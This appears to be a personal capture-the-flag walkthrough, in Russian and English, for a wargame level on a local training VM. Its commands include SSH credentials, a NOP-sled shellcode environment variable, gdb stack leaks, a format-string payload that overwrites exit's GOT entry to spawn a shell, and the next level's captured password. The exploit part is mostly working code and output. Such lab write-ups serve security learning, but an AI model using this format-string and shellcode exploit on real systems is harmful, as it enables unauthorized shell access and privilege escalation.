ssh  level00@192.168.56.101 -p 4242
password:level00

su level05
3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aN

берем shellcode
https://shell-storm.org/shellcode/files/shellcode-827.html

export SHELLCODE=`python -c 'print("\x90" * 0xffff + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")'`

(gdb) python -c 'print "a"*4 + " %x"*12' | ./level05
aaaa 64 f7fcfac0 f7ec3af9 fffed68f fffed68e 0 ffffffff fffed714 f7fdb000 61616161 20782520 25207825 - это куда кладется результат printf

(gdb) i func exit
Non-debugging symbols:
0x08048370  exit
0x08048370  exit@plt

(gdb) x/i 0x08048370
   0x8048370 <exit@plt>:	jmp    *0x80497e0

(gdb) b *main+8
(gdb) run
(gdb) x/500s *((char**)environ)

Взял участок памяти: 0xffff0101

0xffff = 65535 - 257 = 65278 -> это положим вот сюда "\xe2\x97\x04\x08"
0x0101 = 257 - 8 = 249 -> это положим вот сюда "\xe0\x97\x04\x08" 

(python -c 'print("\xe0\x97\x04\x08" + "\xe2\x97\x04\x08" + "%249x%10$hn" + "%65278x%11$hn")' ; cat) | ./level05

whoami
level06

cd ../level06

cat .pass
h4GtNnaMs2kZFN92ymTr2DcJHAzMfzLW25Ep59mq